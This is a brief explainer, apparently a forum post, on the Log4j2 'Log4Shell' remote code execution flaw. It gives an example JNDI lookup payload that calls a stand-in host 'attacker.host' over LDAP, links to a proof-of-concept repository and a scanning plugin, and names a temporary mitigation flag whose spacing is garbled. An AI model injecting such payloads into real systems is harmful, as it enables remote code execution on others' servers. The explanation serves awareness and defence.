How it’s work:
- We send a specially formed request like $ {jndi: ldap: //attacker.host/blabla} to any place that can potentially be logged.
- JNDI (Java Naming and Directory Interface), in turn, processes the template, requests data via LDAP from attacker.host
- In the response, a JAVA class is given, which allows you to execute arbitrary code.
PoC: https://github.com/tangxiaofeng7/apache-log4j-poc
Log4j2 RCE BurpSuite Plugin: https://github.com/whwlsfb/Log4j2Scan
What companies affected: https://github.com/YfryTchsGD/Log4jAttackSurface
Temporary fix: JAVA_OPTS = “- Dlog4j.formatMsgNoLookups = true”
